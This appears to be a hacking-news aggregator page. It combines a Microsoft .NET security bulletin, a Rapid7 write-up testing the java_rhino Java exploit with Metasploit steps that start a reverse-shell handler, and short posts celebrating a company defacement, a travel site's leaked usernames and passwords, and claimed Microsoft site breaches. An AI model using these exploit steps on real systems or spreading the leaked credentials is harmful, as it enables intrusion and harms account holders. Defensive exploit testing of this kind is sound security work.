Posted by News-h Reporter
10:19 pm
Share This Article on Your Social Network :
Posted by News-h Reporter
3:59 am
This security update resolves a publicly disclosed vulnerability in Microsoft .NET Framework. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs). Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario. This vulnerability could also be used by Windows .NET applications to bypass Code Access Security (CAS) restrictions.
This security update is rated Critical for all affected releases of Microsoft .NET Framework for Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by correcting the manner in which the .NET Framework handles certain types of function calls. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Read More
Posted by News-h Reporter
3:27 am
@_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one. To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running java, you can use this link, and click “Do I have Java?” below the big red 'Free Java Download' button."
We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and is an easy-to-exploit client-side that does little to make the user aware they're being exploited.
Microsoft Windows:
Both Windows XP and Windows 7 were tested for vulnerability, a session was generated in every browser that was tested when the system was running java versions prior to the latest. Note that Chrome did prompt the user to let them know the java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.
WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11
Ubuntu Linux:
Several linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin. The Iced Tea java plugin was determined to not be vulnerable, though it wasn't tested extensively, it may still be vulnerable.
An attempt was made to update the Ubuntu 10.04 device, and the java package was downloaded and linked to system java, however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395 .html - However, even after following these instructions, i was unable to get this process to work, and simply disabled java on the vulnerable device.
Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not, however, when i went to disable the plugin, i noticed that the 'update' button lead me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.
Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories
Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin
Apple OS X:
Interesting issue here, I was forced to update, restart, then update again to get the updated sun java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus, a second update was required to get the latest java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.
Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.
OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11
Testing for the java_rhino vulnerability:
You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers, it will be available in the Pro / Express / Community product later today.
msf exploit(handler) > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > info
msf exploit(java_rhino) > set URIPATH xxxx
msf exploit(java_rhino) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.11:4444
[*] Using URL: hxxp://0.0.0.0:8080/xxxx
[*] Local IP: hxxp://10.0.0.11:8080/xxxx
[*] Server started.
Point vulnerable systems at the URL, and wait for your sessions.
Source: Rapid7
Posted by News-h Reporter
3:22 am
ASIC Design Service and Platform SOC Solution SOC/IP/MPW/COT/ART Turn Key Design service provider
Company PGC (Progate Group Corporation) Hacked By Hitcher
Hacked site Link
http://www.pgc.com.tw/index.asp
Mirror Link
http://www.zone-h.org/mirror/id/15866463
Company Info
PGC Inc First Taiwanese company to focus on SoC, SiP IC design services, professional company, won the 2000 Ninth National Award,
and was ISO9001 and 14001 quality certification.
There integrated services are with well-known leader in the world, including TSMC, ASE, ARM, Artisan and other cooperative network relationships, provide customer Gate Array, Standard Cell, Intellectual Property and Multi-Projects Wafer needs chip design, manufacturing, packaging and testing services.
Last year more industry-leading, the introduction of technology for deep submicron design tools tailored to the advanced (IC Compiler), for the company to enter the 90-nm and 65 nm era, the establishment of a more solid overall competition in niche industrial technology .Company in view of the United States, Japan and Europe market has more than 70% of total revenue, to enhance customer service
Posted by News-h Reporter
3:16 am
India biggest Travel
ezeego webiste all username and pass leaked
Messege: "Buddha was born in Nepal not in India stop cloning lumbini"
You can see the exposed user info
Here & Download All username and pass from
Here.
Posted by News-h Reporter
4:32 am
Today a hacked named Ion From team openfire was able to find Microsoft Russia website.The hacker said to the news that he has already reported to officials of Microsoft .
Greetings :Coded32,teku,artful doger,john hoder,serpent,olli muller,optic fiber
Posted by News-h Reporter
2:28 am
Xss vulnerability found in Microsoft Website by $(-)@(-)954 $h3rrY $!D member of Pakistan Cyber HunterZ. Vulnerable link hide due to security region.
Status : Unpatch.
